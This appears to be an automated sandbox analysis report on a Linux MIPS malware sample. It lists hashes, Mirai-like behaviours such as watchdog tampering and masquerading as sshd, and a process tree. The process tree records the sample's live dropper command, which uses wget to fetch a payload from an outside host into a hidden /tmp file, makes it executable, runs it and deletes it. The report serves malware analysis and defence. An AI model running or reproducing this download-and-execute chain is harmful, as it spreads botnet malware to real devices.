Analysis
-
max time kernel
148s -
max time network
139s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
02/04/2024, 01:16
Behavioral task
behavioral1
Sample
93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
Resource
debian9-mipsel-20240226-en
General
-
Target
93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf
-
Size
155KB
-
MD5
66617f9932e2e20f48493f12c80fceb7
-
SHA1
278410f9e356ad62dc2d66c426d2b60545918923
-
SHA256
93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2
-
SHA512
22fa7850204dc9296eaba8312cebe36facc2cdb999590f0fca2cd8bbeb09cb049ec792e2439bd6b2fcc54e6a9bbab0f2199c4069705a315630228ca0855d2c91
-
SSDEEP
3072:1LNqrhHZ0P6bRFBQivfRjHkLwmrThPaLEne7rNb:1Lsrr0PeRTJBgLwmrThPaLEne7rNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 709 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 727 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/misc/watchdog File opened for modification /dev/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route 93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf/tmp/93baaaabfc573289b7cea910738e996f36b616b93a40a2ecfb84d14d1a2e5da2.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:709 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:710
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:714
-
-
/bin/chmodchmod 777 .....3⤵PID:725
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:727
-
-
/bin/sh/bin/sh ./.....3⤵PID:727
-
-
/bin/rmrm -rf .....3⤵PID:730
-
-